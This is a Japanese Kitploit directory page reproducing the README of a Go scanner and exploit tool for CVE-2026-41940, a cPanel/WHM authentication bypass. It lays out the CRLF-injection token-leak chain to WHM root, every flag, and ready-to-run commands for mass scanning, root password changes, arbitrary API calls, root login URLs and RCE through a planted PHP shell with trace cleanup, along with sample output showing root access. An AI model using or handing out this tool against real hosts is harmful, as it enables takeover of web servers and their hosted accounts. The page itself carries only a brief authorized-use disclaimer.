Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cPanelWHM-AuthBypass — Goベースのスキャナおよびエクスプロイトツールで、cPanel/WHMにおける認証バイパスであるCVE-2026-41940に対応しています。バッチスキャン、トークン漏洩、およびRCE、パスワード変更、API呼び出しなどのポストエクスプロイトアクションをサポートします。 | Kitploit
ツール/GitHubGitHub/kagantua/cpanelwhm-authbypass
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証レッドチーミング
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Goベースのスキャナおよびエクスプロイトツールで、cPanel/WHMにおける認証バイパスであるCVE-2026-41940に対応しています。バッチスキャン、トークン漏洩、およびRCE、パスワード変更、API呼び出しなどのポストエクスプロイトアクションをサポートします。

リポジトリを見る
11744ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

cPanel/WHM Auth Bypass Scanner & Exploit Tool

watchTowr の Python PoC を Go で書き直したコマンドラインツールで、CVE-2026-41940 cPanel/WHM 認証バイパス脆弱性の検出と悪用を行います。

脆弱性の概要

CVE-2026-41940 は cPanel/WHM の認証バイパス脆弱性で、攻撃チェーンは CRLF インジェクションを Basic Auth ヘッダーに仕込み、セキュリティトークンを漏洩させて WHM root 権限を取得します。

4 段階の攻撃チェーン:

  1. 事前認証 — /login/ に誤った認証情報を送信し、生の whostmgrsession cookie を取得
  2. CRLF インジェクション — Authorization: Basic ヘッダーに改行を注入し、サーバーに 307 リダイレクトの Location ヘッダーで cpsess セキュリティトークンを漏洩させる
  3. トークンの伝播 — do_token_denied をトリガーし、注入した認証データを元のストレージからキャッシュへ伝播させる
  4. 権限の検証 — 漏洩したトークンを使用して /json-api/version にアクセスし、root 権限を取得できたか検証

機能

  • バッチスキャン — ファイルからターゲットを一括検出し、並列実行
  • 単一ターゲット検出 — 単一の URL を指定して迅速に検証
  • URL スマート処理 — http://、https://、プロトコルなしの形式に自動対応し、自動重複排除
  • 脆弱性の悪用
    • root パスワードの変更 (-passwd)
    • 任意の WHM API 呼び出し (-api)
    • ワンクリックログイン URL の生成 (-session)
    • リモートコマンド実行 / RCE (-cmd)
  • ターミナルハイライト — [VULN] は赤、[SAFE] は緑で強調表示
  • 結果の保存 — 脆弱性のある URL を自動的にファイルへ保存

ビルド

root@kitploit:~
# Go 1.20+ が必要
cd cpanel-checker
go build -o cpanel-checker .

使用方法

パラメータ一覧

パラメータ説明例
-u単一のターゲット URL-u https://1.2.3.4:2087
-fURL リストを含むファイル-f targets.txt
-o出力ファイルパス (デフォルト result.txt)-o vuln.txt
-c並列数 (デフォルト 10)-c 20
-hostnameHost ヘッダーを手動指定 (デフォルトは自動検出)-hostname cpanel.example.com
-passwdroot パスワードを変更 (-u モードのみ)-passwd NewP@ss123
-apiWHM API 関数を呼び出し (-u モードのみ)-api listaccts
-api-paramsWHM API パラメータ(カンマ区切り)-api-params user=root,password=123
-sessionroot ワンクリックログイン URL を生成 (-u モードのみ)-session
-keepRCE の一時アカウントを削除せず保持 (-cmd と併用)-keep
-cmdリモートコマンドを実行 / RCE (-u モードのみ)-cmd "id"

1. 単一ターゲットの検出

root@kitploit:~
./cpanel-checker -u https://target:2087

ポートはデフォルトで 2087 です。以下の書き方も同等です:

root@kitploit:~
./cpanel-checker -u https://target
./cpanel-checker -u target

2. バッチスキャン

root@kitploit:~
./cpanel-checker -f targets.txt -c 20

targets.txt は以下の形式に対応しています(1 行に 1 つ、# で始まる行はコメント):

root@kitploit:~
https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# これはコメントです
  • 自動重複排除:http://1.1.1.1 と https://1.1.1.1 は同一ターゲットとみなされ、1 回だけスキャンされます
  • プロトコルなしのアドレスは自動的に https:// が補完されます
  • ポートなしのアドレスは自動的に 2087 が使用されます
  • 結果は result.txt に保存されます(-o でカスタマイズ可能)

3. root パスワードの変更

root@kitploit:~
./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"

4. 任意の WHM API 呼び出し

root@kitploit:~
# すべてのアカウントを一覧表示
./cpanel-checker -u https://target:2087 -api listaccts

# パラメータ付きで呼び出し
./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"

5. ワンクリックログイン URL の生成

root@kitploit:~
./cpanel-checker -u https://target:2087 -session

URL が出力されるので、ブラウザで開くと WHM 管理パネルに入れます。パネル内の Terminal 機能を使用すると、対話型の root シェルを取得できます。

注意:-session は半自動です — ツールがログイン URL を生成した後、手動でブラウザで開く必要があります。

6. リモートコマンド実行 (RCE)

root@kitploit:~
./cpanel-checker -u https://target:2087 -cmd "id"

-keep を付けると一時アカウントを保持し、cPanel 管理画面へのログインに使用できます:

root@kitploit:~
./cpanel-checker -u https://target:2087 -cmd "id" -keep

-keep を使用すると、出力に一時アカウントのユーザー名、パスワード、cPanel ログインアドレス(https://host:2083)が含まれます。これらの認証情報で cPanel パネルに直接ログインできます。

-cmd は全自動で、他の手動操作は不要です。内部フロー:

  1. 認証バイパスを利用して root 権限を取得
  2. WHM API 経由で一時 cPanel アカウントを作成
  3. UAPI (Fileman::save_file_content) 経由で PHP シェルを ~/public_html/ に書き込み
  4. HTTP 経由で https://host/~tmpuser/shell.php にアクセスしてコマンドを実行
  5. コマンド出力を返す
  6. 一時アカウントを自動削除(痕跡のクリーンアップ)

前提条件:ターゲットの 80 または 443 ポートに到達可能であり、Apache/httpd が実行されている必要があります。

7. 組み合わせ使用

複数の悪用パラメータを同時に使用できます:

root@kitploit:~
# ログイン URL の取得、コマンド実行、パスワード変更を同時に行う
./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"

8. Host ヘッダーの手動指定

ターゲット IP が cPanel 設定のホスト名と一致しない場合、手動で指定できます:

root@kitploit:~
./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com

デフォルトでは、ツールは /openid_connect/cpanelid の 307 リダイレクトを通じて正しいホスト名を自動検出します。

出力例

バッチスキャン

root@kitploit:~
[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched

========== スキャン完了 ==========
合計: 5 | 脆弱性あり: 2

  ● https://1.1.1.1:2087
  ● https://4.4.4.4:2087

[+] 結果は result.txt に保存されました

RCE 実行

root@kitploit:~
[*] ターゲット: https://target:2087
[*] モード: 脆弱性の悪用

[0] hostname = cpanel.example.com
[1] minting a preauth session...
    session base = abc123def456
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    leaked token = /cpsess1234567890
[3] firing do_token_denied to propagate raw -> cache...
    gadget fired
[4] verifying we're WHM root...
[+] WHM root 権限を取得しました

[*] リモートコマンドを実行中 (RCE)...
    [a] 一時アカウントを作成: tmpabcde
    [b] シェルを書き込み: /home/tmpabcde/public_html/random.php
    [c] コマンドを実行: id
    [d] 一時アカウントをクリーンアップ: tmpabcde
[+] コマンド出力:
uid=0(root) gid=0(root) groups=0(root)

[+] 完了。https://target:2087 は制御下にあります

注意事項

  • 悪用パラメータ (-passwd、-api、-session、-cmd) は -u 単一ターゲットモードでのみ使用可能で、-f バッチモードには対応していません
  • ツールはデフォルトで TLS 証明書の検証をスキップします
  • リクエストのタイムアウトは 15 秒です
  • URL ファイル内の # で始まる行は無視されます

免責事項

本ツールは許可されたセキュリティテストおよび研究専用です。許可なくシステムをテストすることは違法行為です。利用者は、対象システムの所有者から明確な書面による許可を得ていることを確認する必要があります。作者は不正使用によるいかなる責任も負いません。

謝辞

  • 元の PoC: watchTowr / Sina Kheirkhah (@SinSinology)
  • CVE: CVE-2026-41940
ツールをダウンロード